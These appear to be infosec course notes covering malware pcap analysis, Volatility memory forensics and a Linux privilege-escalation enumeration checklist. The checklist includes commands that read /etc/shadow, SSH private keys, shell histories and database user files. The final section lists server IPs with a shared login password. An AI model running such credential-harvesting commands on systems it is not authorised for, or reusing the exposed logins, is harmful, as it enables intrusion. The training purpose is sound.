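# With no pcap argument, show the formatter on the constructed sample instead.
if [ -n "${1:-}" ] && [ -f "$1" ]; then
    lookup_pcap "$1" "${2:-10.0.3.15}"
else
    sample_requests | format_http_requests 10.0.3.15
fi
```

On the sample the formatter keeps two of the five lines: the index page and the ads request with its query string cut to "?...". The client address is a parameter rather than a hard-coded grep, so the same function serves any host in the capture.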



Let's grab some PCAP files
---------------------------Type This-----------------------------------
cd ~/students/yourname/programming_fundamentals
mkdir pcaps
cd pcaps
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/APT41/APT41_StoreSyncSvc.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Agent_Tesla/agenttesla_09July2019.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/CVE-2019-9978/CVE-2019-9978_attempt_05May2019.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Powershell/Powershell_script_19Dec2019.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/sharik_smoke/sharik_smoke.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0703.pcap
wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0801.pcap
------------------------------------------------------------------------


Let's read file names into an array
---------------------------Type This-----------------------------------

nano parse_pcap_file_names.sh

---------------------------Paste This-----------------------------------
#!/bin/bash
# Reference: https://delightlylinux.wordpress.com/2017/04/08/put-filenames-in-bash-array/

declare -a arrPCAPs
for file in *.pcap
do
# append to the array; the original rebuilt it from a misspelled name (PCAPs),
# which silently left only the last file in it
arrPCAPs+=("$file")
done
echo "${#arrPCAPs[@]} pcap files:"
printf '%s\n' "${arrPCAPs[@]}"
------------------------------------------------------------------------



Ok, now let's run it
---------------------------Type This-----------------------------------
chmod +x parse_pcap_file_names.sh
./parse_pcap_file_names.sh
------------------------------------------------------------------------




##################
# Day 4 Homework #
##################

Task Option 1: Shell Scripting
------------------------------------
Watch and do all of the exercises in the video https://www.youtube.com/watch?v=hwrnmQumtPw
Create a Word document that contains screenshots of the tasks performed in this video
Name the Word document 'YourFirstName-YourLastName-LinuxDay4-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay4-ShellScripting.docx')
Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow


Task Option 2: Python3
---------------------------------------
Watch and do all of the exercises in the first 7 videos from https://www.youtube.com/playlist?list=PLypxmOPCOkHVzhKRcWzEkQXCnmHezGVeB
Create a Word document that contains screenshots of the tasks performed in these videos
Name the Word document 'YourFirstName-YourLastName-LinuxDay4-Python3.docx' (ex: 'Joseph-McCray-LinuxDay4-Python3.docx')
Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow




####################
# Day 5: Challenge #
####################




###################
# Memory Analysis #
###################
---------------------------Type This-----------------------------------
cd ~/Desktop/

sudo apt-get install -y foremost tcpxtract

wget https://infosecaddicts-files.s3.amazonaws.com/hn_forensics.vmem

git clone https://github.com/volatilityfoundation/volatility.git

cd volatility
***Volatility 2 is Python 2 code: if "python" on your box is Python 3, use python2/pip2 for the commands below***
sudo pip install distorm3
sudo python setup.py install
python vol.py -h
python vol.py pslist -f ~/Desktop/hn_forensics.vmem
python vol.py connscan -f ~/Desktop/hn_forensics.vmem
mkdir dump/
mkdir -p output/pdf/
python vol.py -f ~/Desktop/hn_forensics.vmem memdump -p 888 -D dump/
python vol.py -f ~/Desktop/hn_forensics.vmem memdump -p 1752 -D dump/
***Takes a few min***
strings dump/1752.dmp | grep "^http://" | sort | uniq
strings dump/1752.dmp | grep "Ahttps://" | uniq -u
foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
cd ~/Desktop/volatility/output/pdf/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd ~/Desktop/volatility/output/pdf/
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw pdf/00601560.pdf
python pdf-parser.py --object 11 pdf/00600328.pdf
python pdf-parser.py --object 1054 --raw --filter pdf/00601560.pdf > malicious.js

cat malicious.js
-----------------------------------------------------------------------
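The two strings | grep lines above pull URLs out of the process dump by hand. The functions below are an added example, not part of the course notes, that do the same on any raw dump with grep -a (so they work even where strings is not installed) and add a per-host hit count, which is usually the question you actually have about a process dump. The sample dump they build is constructed for the test and is not data from hn_forensics.vmem; the function names are assumptions.

```bash
#!/bin/bash
# Added example, not code from the course notes. The two "strings | grep" lines
# above pull URLs out of a process dump by hand; these functions do the same on
# any raw dump and also count hits per host. grep -a treats the binary as text,
# -o prints only the matching URL, and the explicit character class stops at
# NUL bytes, quotes and whitespace, so junk next to a URL is not glued onto it.

# urls_in_dump FILE  - every distinct http(s) URL in FILE, one per line
urls_in_dump() {
    grep -aoE 'https?://[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+' "$1" | sort -u
}

# hosts_in_dump FILE  - "count host" for each host seen, most frequent first
hosts_in_dump() {
    grep -aoE 'https?://[A-Za-z0-9._-]+' "$1" \
        | sed 's#^https*://##' | sort | uniq -c | sort -rn
}

# make_sample_dump FILE  - constructed stand-in for dump/1752.dmp: a few URLs
# between NUL bytes and filler (not data from hn_forensics.vmem)
make_sample_dump() {
    printf 'filler\0\0http://example.test/login.php?u=1\0\0x\0https://cdn.example.test/a.js\0\0http://example.test/login.php?u=1\0' > "$1"
}

# Usage on the real dump:
#   urls_in_dump dump/1752.dmp
#   hosts_in_dump dump/1752.dmp
```

On the sample, urls_in_dump returns two distinct URLs and hosts_in_dump puts example.test first with two hits. Note that the page's second grep looks for "Ahttps://" rather than "https://"; this version matches the scheme directly.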



*****Sorry - no time to cover JavaScript de-obfuscation today*****



---------------------------Type This-----------------------------------
cd ~/Desktop/volatility
mkdir files2/
python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
-----------------------------------------------------------------------


######################
# Intro to Reversing #
######################
Lab walk-through documents are in the zip file along with the executables that need to be reversed:
https://infosecaddicts-files.s3.amazonaws.com/Lena151.zip




##############################
# Linux For InfoSec Homework #
##############################
In order to receive your certificate of attendance you must complete all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.


Submit the results via email in an MS Word document (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx)




###############################
# Linux For InfoSec Challenge #
###############################

In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).

Submit the results via email in an MS Word document (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx)




IMPORTANT NOTE:
Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.


#########################################################################
# What kind of Linux am I on and how can I find out?                    #
# Great reference:                                                      #
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/    #
#########################################################################
- What's the distribution type? What version?
-------------------------------------------
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based



- What's the kernel version? Is it 64-bit?
-------------------------------------------
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-



- What can be learnt from the environment variables?
----------------------------------------------------
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


- What services are running? Which service runs with which user's privileges?
------------------------------------------------------------------
ps aux
ps -ef
top
cat /etc/services


- Which services are being run by root? Of those, which are vulnerable? It's worth a double check!
---------------------------------------------------------------------------------------------------------------
ps aux | grep root
ps -ef | grep root



- What applications are installed? What version are they? Are they currently running?
------------------------------------------------------------------------------------
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives/
ls -alh /var/cache/yum/


- Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
------------------------------------------------------------------------------------
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^........w/' # world-writable entries (9th permission character is other-write)



- What jobs are scheduled?
------------------------
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root


- Any plain text usernames and/or passwords?
------------------------------------------
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Search for Joomla passwords (single quotes stop the shell expanding $password to nothing)


- What NIC(s) does the system have? Is it connected to another network?
---------------------------------------------------------------------
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


- What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
------------------------------------------------------------------------------------------------------------------------
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

- What other users & hosts are communicating with the system?
-----------------------------------------------------------
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w



- What's cached? IP and/or MAC addresses
-------------------------------------
arp -e
route
/sbin/route -nee


- Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
------------------------------------------------------------------------------------------
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l



- What sensitive files can be found?
----------------------------------
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/



- Anything "interesting" in the home directories? If it's possible to access them
----------------------------------------------------------------------------
ls -ahlR /root/
ls -ahlR /home/


- Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
---------------------------------------------------------------------------------------------------------------------------
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


- What has the user been doing? Is there any password in plain text? What have they been editing?
-----------------------------------------------------------------------------------------------
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history



- What user information can be found?
-----------------------------------
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


- Can private-key information be found?
-------------------------------------
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


- Any settings/files (hidden) on website? Any settings file with database information?
------------------------------------------------------------------------------------
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


- Is there anything in the log file(s)? (Could help with "Local File Includes"!)
-----------------------------------------------------------------------------
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

- Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
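The checklist above is a set of one-liners to type by hand. As an added example that is not part of the notes or of the g0tmi1k post they cite, here are a few of those checks as shell functions that take their input file or directory as a parameter: with no argument they inspect the live box, with an argument they can be run against a copied or constructed file. The sample passwd entries (including the second UID-0 account "toor"), the file names and the function names are made up for the test.

```bash
#!/bin/bash
# Added example, not code from the course notes or from the g0tmi1k post it
# cites. A handful of the checklist items above as functions that take their
# input file or directory as a parameter: with no argument they inspect the
# live system, with an argument they can be run against a copied or
# constructed file, which is how the sample data at the bottom is used.

# uid0_accounts [PASSWD]
#   Every account with UID 0, not only "root" (a second UID-0 user is a classic
#   backdoor); comment lines are skipped.
uid0_accounts() {
    awk -F: '!/^#/ && $3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# login_shells [PASSWD]
#   Accounts whose shell is not nologin/false, i.e. the ones that can log in.
login_shells() {
    awk -F: '!/^#/ && $7 !~ /(nologin|false)$/ { print $1 ":" $7 }' "${1:-/etc/passwd}"
}

# world_writable_files [DIR]
#   Regular files under DIR that anyone may modify. This is the question the
#   "ls -aRl /etc | awk" one-liner is reaching for; -perm asks the kernel for
#   the mode bits instead of pattern-matching ls output.
world_writable_files() {
    find "${1:-/etc}" -xdev -type f -perm -0002 2>/dev/null
}

# suid_binaries [DIR]
#   Files with the setuid bit; each one runs as its owner, usually root.
suid_binaries() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# cron_entries [CRONTAB]
#   Active lines of a crontab, comments and blank lines removed.
cron_entries() {
    grep -vE '^[[:space:]]*(#|$)' "${1:-/etc/crontab}"
}

# --- constructed test data (made-up accounts and files, not from any host) ---
make_sample_passwd() {
    cat > "$1" <<'EOF'
# sample passwd file
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second uid 0 account:/root:/bin/sh
bob:x:1000:1000:Bob:/home/bob:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
}

make_sample_tree() {
    mkdir -p "$1/etc"
    printf 'db_pass=secret\n' > "$1/etc/app.conf";   chmod 644  "$1/etc/app.conf"
    printf 'anyone can edit\n' > "$1/etc/open.conf"; chmod 666  "$1/etc/open.conf"
    printf '#!/bin/sh\n' > "$1/etc/helper";          chmod 4755 "$1/etc/helper"
}

# Usage on the live box:
#   uid0_accounts; login_shells; world_writable_files /etc; suid_binaries /; cron_entries
```

Against the sample data, uid0_accounts reports both root and toor, login_shells lists three accounts, and the find-based checks return exactly the world-writable config and the setuid helper. Keeping the path as a parameter is also what lets you run the same functions over a mounted disk image or a copied /etc during an investigation.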




########################################################################################################################################




####################################
# Day 2: Building a Perfect Server #
####################################
-------------------------------------------
Task 1: Log in to your respective Linux server
PMRF1 (Hugo/Ross)
45.76.61.100
pmrf aegisashore

PMRF2 (steve/jeff)
155.138.213.248
pmrf aegisashore

PMRF3 (elaine)
155.138.198.202
pmrf aegisashore



Task 2: Build the Perfect Server
https://www.howtoforge.com/tutorial/perfect-server-centos-7-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/

Important notes:
Steps to skip
skip all of step 1
skip all of step 2
skip all of step 3
skip all of step 5

step 11 amavisd may not work. If it doesn't work just keep moving forward
---------------------------------------------